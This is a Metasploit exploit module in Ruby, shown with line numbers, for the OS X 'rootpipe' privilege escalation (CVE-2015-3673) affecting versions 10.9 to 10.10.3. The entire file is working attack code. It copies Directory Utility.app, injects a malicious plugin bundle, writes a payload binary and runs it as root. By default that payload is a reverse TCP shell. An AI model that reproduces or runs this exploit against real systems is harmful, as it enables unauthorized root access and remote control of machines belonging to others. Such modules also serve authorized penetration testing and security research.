1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = GreatRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::OSX::Priv
11
  include Msf::Post::OSX::System
12
  include Msf::Exploit::EXE
13
  include Msf::Exploit::FileDropper
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
20
        'Description' => %q{
21
          This module exploits the rootpipe vulnerability and bypasses Apple's initial
22
          fix for the issue by injecting code into a process with the 'admin.writeconfig'
23
          entitlement.
24
        },
25
        'Author' => [
26
          'Emil Kvarnhammar', # Vulnerability discovery and PoC
27
          'joev'              # Copy/paste monkey
28
        ],
29
        'References' => [
30
          ['CVE', '2015-3673'],
31
          ['URL', 'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
32
        ],
33
        'DisclosureDate' => '2015-07-01',
34
        'License' => MSF_LICENSE,
35
        'Platform' => 'osx',
36
        'Arch' => ARCH_X64,
37
        'SessionTypes' => ['shell'],
38
        'Privileged' => true,
39
        'Targets' => [
40
          ['Mac OS X 10.9-10.10.3', {}]
41
        ],
42
        'DefaultTarget' => 0,
43
        'DefaultOptions' => {
44
          'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
45
          'PrependSetreuid' => true
46
        },
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options [
56
      OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
57
    ]
58
  end
59

60
  def base_dir
61
    datastore['WritableDir'].to_s
62
  end
63

64
  def check
65
    if ver? && is_admin?
66
      vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
67
      return CheckCode::Appears
68
    else
69
      return CheckCode::Safe
70
    end
71
  end
72

73
  def exploit
74
    if is_root?
75
      fail_with Failure::BadConfig, 'Session already has root privileges'
76
    end
77

78
    unless is_admin?
79
      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
80
    end
81

82
    if check != CheckCode::Appears
83
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
84
    end
85

86
    unless writable? base_dir
87
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
88
    end
89

90
    print_status("Copying Directory Utility.app to #{new_app}")
91
    cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
92
    cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")
93

94
    print_status("Writing bundle plist to `#{plist_file}'")
95
    write_file(plist_file, plist)
96

97
    print_status("Writing payload to `#{payload_file}'")
98
    write_file(payload_file, binary_payload)
99
    register_file_for_cleanup(payload_file)
100

101
    print_status("Writing malicious shared library to `#{exploit_file}'")
102
    write_file(exploit_file, plugin_exploit)
103

104
    print_status("Running Directory Utility.app")
105
    cmd_exec("/bin/sh -c 'PAYLOAD_IN=#{payload_file} PAYLOAD_OUT=#{root_file} #{new_app}/Contents/MacOS/Directory\\ Utility'")
106

107
    print_status("Deleting Directory Utility.app")
108
    cmd_exec("rm -Rf '#{new_app}'")
109

110
    print_status('Executing payload...')
111
    cmd_exec("/bin/sh -c '#{root_file} &'")
112
  end
113

114
  def ver?
115
    Rex::Version.new(get_sysinfo['ProductVersion']).between?(
116
      Rex::Version.new('10.9'), Rex::Version.new('10.10.3')
117
    )
118
  end
119

120
  def sploit
121
    "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
122
  end
123

124
  def plugin_exploit
125
    File.read(File.join(
126
      Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug'
127
    ))
128
  end
129

130
  def binary_payload
131
    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
132
  end
133

134
  def exploit_file
135
    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
136
  end
137

138
  def plist_file
139
    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
140
  end
141

142
  def new_app
143
    @app ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}.app"
144
  end
145

146
  def plist
147
    %Q|
148
      <?xml version="1.0" encoding="UTF-8"?>
149
      <plist version="1.0">
150
      <dict>
151
        <key>CFBundleGetInfoString</key>
152
        <string>RootpipeBundle</string>
153
        <key>CFBundleExecutable</key>
154
        <string>RootpipeBundle</string>
155
        <key>CFBundleIdentifier</key>
156
        <string>com.root.pipe</string>
157
        <key>CFBundleName</key>
158
        <string>RootpipeBundle</string>
159
        <key>CFBundleShortVersionString</key>
160
        <string>0.01</string>
161
        <key>CFBundleInfoDictionaryVersion</key>
162
        <string>6.0</string>
163
        <key>CFBundlePackageType</key>
164
        <string>APPL</string>
165
        <key>IFMajorVersion</key>
166
        <integer>0</integer>
167
        <key>IFMinorVersion</key>
168
        <integer>1</integer>
169
      </dict>
170
      </plist>
171
    |
172
  end
173

174
  def payload_file
175
    @payload_file ||=
176
      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
177
  end
178

179
  def root_file
180
    @root_file ||=
181
      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
182
  end
183
end
184

185